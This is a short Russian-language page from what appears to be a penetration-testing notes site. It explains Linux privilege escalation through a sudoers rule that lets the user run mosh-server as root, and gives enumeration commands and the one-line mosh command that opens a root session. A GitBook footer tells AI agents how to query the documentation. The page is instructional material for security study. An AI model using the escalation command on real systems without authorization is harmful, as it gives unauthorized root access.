> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/privesc/sudoers/sudo-mosh-server-linux-privilege-escalation.md).

# Sudo Mosh-Server — повышение привилегий в Linux

## Что это такое

Повышение привилегий в sudoers начинается с команд, которые пользователь может запускать через `sudo`. Неправильно настроенные бинарные файлы, небезопасные аргументы скриптов, обработка символических ссылок и уязвимые версии sudo могут превратить ограниченные права sudo в оболочку root. Эта конкретная страница посвящена **Sudo (Mosh-Server)** и делает процесс эксплуатации практичным: определить условие, безопасно его проверить, а затем запустить минимальный полезный код, необходимый для подтверждения воздействия.

## Перечисление

Сначала подтвердите локальный контекст и точную ошибку настройки перед запуском пути эксплуатации.

```bash
sudo -l
sudo --version
```

## Примеры

Проверив разрешения с помощью `sudo -l` команды, мы обнаруживаем, что пользователь **svcMosh** может запускать двоичный файл **mosh-server** с правами администратора без ввода пароля

```bash
sudo -l
```

<figure><img src="/files/28c22b47e19f342997d75259702a874b1a615aa8" alt=""><figcaption></figcaption></figure>

> Поскольку вы можете запускать **mosh-server** от имени root, вы можете использовать это для подключения к **mosh** используя **sudo** чтобы запускать сервер от имени администратора.

Следующая команда запустит **mosh-server** с правами root, а затем установит соединение с клиентом **mosh**:

```bash
mosh --server="sudo /usr/bin/mosh-server" localhost
```

Это позволит **mosh** подключиться к **mosh-server** серверу, работающему от имени root на **localhost**. Используя этот метод, вы получите привилегированный доступ к машине с правами администратора.

<figure><img src="/files/7cf566a5a29498f87b79658d19b0b878ed4f0c6c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/privesc/sudoers/sudo-mosh-server-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
